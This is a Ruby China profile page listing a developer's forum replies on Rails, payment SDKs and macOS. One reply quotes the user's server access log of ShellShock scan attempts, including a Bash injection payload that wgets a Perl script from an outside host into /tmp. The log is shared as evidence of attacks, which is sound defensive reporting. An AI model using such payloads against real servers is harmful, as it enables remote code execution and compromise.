Ruby China
  • 社区
  • 招聘
  • Wiki
  • 酷站
  • Gems
  • 注册
  • 登录
😝😈
@hungyuhei
高级会员
第 77 位会员 / 2011-11-14

广州
23 篇帖子 / 537 条回帖
10 关注者
0 正在关注
80 收藏
GitHub Public Repos
  • wechat_pay 33

    Wechat Pay For Ruby(微信支付)

  • vimfiles 30

    My vim files

  • Deskmini-310-Hackintosh 13

    Hackintosh Deskmini310 EFI

  • yunpian 5

    Ruby SDK for 云片 http://www.yunpian.com

  • snipmate.vim 2

    snipMate.vim aims to be a concise vim script that implements some of TextMate's snippets features...

  • hungyuhei.github.com 1

  • chuanglan 1

    Ruby SDK for 253 创蓝短信

  • alipass 1

    支付宝卡券

  • acts_as_area_storable 1

  • hsb_tool 0

    HSB color tool

More on GitHub
  • 概况
  • 话题
  • 回帖
  • 收藏
  • 正在关注
  • 关注者
  • 我轻断食的经历 at 2014年12月21日

    比起这些「旁门左道」,我更相信「适量运动 + 控制饮食 + 充足睡眠」这条公式

  • 难以忍受 Yosemite 卡顿,看看抹盘重装看看如何 at 2014年11月28日

    我的 iMac 是自己换成 SSD 的,升级后也是非常卡顿 配置更低的另一台 Air 即非常流畅

  • Ruby China 的流量有没有达到百万级? at 2014年11月12日

    楼主你看,我也可以用这个马甲给你回复。

  • 微信支付 Gem at 2014年11月11日

    我也写了个 https://github.com/HungYuHei/wechat_pay 说起来微信支付的文档真是看得蛋疼

  • [广州][2014年11月29日] GZRUBY 第 21 次聚会 - 15:00 [更新场地信息] at 2014年11月10日

    二维码已过期?

  • 恭喜 Ruby China 三周年纪念日快乐 at 2014年10月28日

    🎂 🎂 🎂

  • 关于支付宝 Ruby + RSA 的求助 at 2014年10月23日

    之前在 alipay 这个 gem 中实现过 rsa 验证的,不过没有实现 rsa 加密,代码应该也不相差太多吧,可以看看我这个 PR https://github.com/chloerei/alipay/pull/10/files#diff-2

  • 升级完 Yosemite,我的 Mac 需要天天关机,否则就会很卡 at 2014年10月23日

    我的 iMac 升级后运行几十分钟后也会变得很卡,但我另一台配置更低的 Air 完全没有这个问题,运行得很流畅,两台机打开的程序差不多是一样的,这次升级很蛋痛

  • 【已更新】ShellShock 漏洞及 OS X 紧急修复方法 at 2014年09月27日

    #20 楼 @PengEdy 感谢

  • 【已更新】ShellShock 漏洞及 OS X 紧急修复方法 at 2014年09月27日
    209.126.230.72 - - [25/Sep/2014:08:31:21 +0800] "GET / HTTP/1.0" 200 4710 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    
    109.95.210.196 - - [26/Sep/2014:01:28:12 +0800] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 200 4710 "-" "() { :;}; /bin/bash -c \x22/usr/bin/wget http://singlesaints.com/firefile/temp?h=hepaimusic.com -O /tmp/a.pl\x22"
    
    54.251.83.67 - - [26/Sep/2014:11:34:24 +0800] "GET / HTTP/1.1" 200 4710 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
    

    我的服务器已经发现有人在扫了 第一行看起来没有恶意,第二行就看起来恶意满满的

  • 同志们,有一些靠谱的第三方微信公众帐号管理平台推荐不? at 2014年09月15日

    好像我司是用 https://socialbase.cn/

  • 近 500 万 Gmail 账号密码遭泄露 at 2014年09月13日

    开启了两步验证,而且密码都是用 1Password 生成的随机数,不怕不怕 😄

  • 使用 RSpec 遇到的问题 at 2014年09月12日

    是不是用了 spring 之类的,如果有的话,先将它停止

  • 如何指定 Gemfile at 2014年09月03日

    #3 楼 @jasonz 我误解了你的问题了,我上面说的参数确实是 bundle-install 的

  • 如何指定 Gemfile at 2014年09月03日

    bundler v1.7.2 有以下的参数

    --binstubs    -- generate bin stubs for bundled gems to ./bin
    --deployment  -- install using defaults tuned for deployment environments
    --frozen      -- do not allow the Gemfile.lock to be updated after this install
    --gemfile     -- use the specified gemfile instead of Gemfile
    --local       -- do not attempt to connect to rubygems.org
    --no-color    -- disable colorization in output
    --path        -- specify a different path than the system default
    --quiet       -- only output warnings and errors
    --system      -- install to the system location
    --without     -- exclude gems that are part of the specified named group
    
  • 为什么网站的支付宝改成 https 就无法收到提醒了? at 2014年09月02日

    我也发现过有这么个问题,看文档也没说不支持 https,只好强制用 http 的地址了,只要做好签名验证还是不怕被修改异步通知数据

  • 这种语法是什么意思? at 2014年09月02日

    其实也类似相对路径和绝对路径

  • 关于 stylesheet_link_tag 及 javascript_include_tag 在雲服務 at 2014年08月29日
    # config/environments/production.rb
    
    # Enable serving of images, stylesheets, and JavaScripts from an asset server.
    config.action_controller.asset_host = "http://YOUR-CDN-URL.COM"
    
  • Mac 下有没有什么好用的数据库建模工具 at 2014年08月28日

    @huacnlee 你指这个 https://github.com/ctran/annotate_models ?

  • Rails 的日志分割配置? at 2014年08月18日

    之前写过一篇日记 http://hungyuhei.github.io/2012/06/28/rotate-log-files-using-logrotate.html

  • 新项目追求稳定,rails 版本用 3.2.16 好,还是用 4.1.0?求坑少 at 2014年08月11日

    @darkbaby123 @Rei 原来是说这回事啊,我还停留在主语为 Rails 上,所以怎么也没想明白「版本上分裂了」是什么意思,原来是说 Python 了

  • 新项目追求稳定,rails 版本用 3.2.16 好,还是用 4.1.0?求坑少 at 2014年08月11日

    #11 楼 @Rei 不太理解这句话

  • 新项目追求稳定,rails 版本用 3.2.16 好,还是用 4.1.0?求坑少 at 2014年08月11日

    果断上最新的,不要学 python 社区啊,哈哈

  • 请问怎么往 ActiveModel 的 json 里加 hash 或者 array at 2014年08月06日

    #7 楼 @birbird json serializer 应该就是指 https://github.com/rails/jbuilder https://github.com/rails-api/active_model_serializers 之类

  • 支付宝的接口真不好用 at 2014年07月17日

    #9 楼 @azhao https://b.alipay.com/order/productDetail.htm?productId=2012111200373124&tabId=3 没写着不同接口费率不同啊,难道你指的是个人版?

  • 上一页
  • 1
  • 2
  • 3
  • 4
  • …
  • 17
  • 18
  • 下一页
关于 / RubyConf / Ruby 镜像 / RubyGems 镜像 / 活跃会员 / 组织 / API / 贡献者
由众多爱好者共同维护的 Ruby 中文社区,本站使用 Homeland 构建,并采用 Docker 部署。
服务器由 赞助 CDN 由 赞助
iOS 客户端 / Android 客户端 简体中文 / English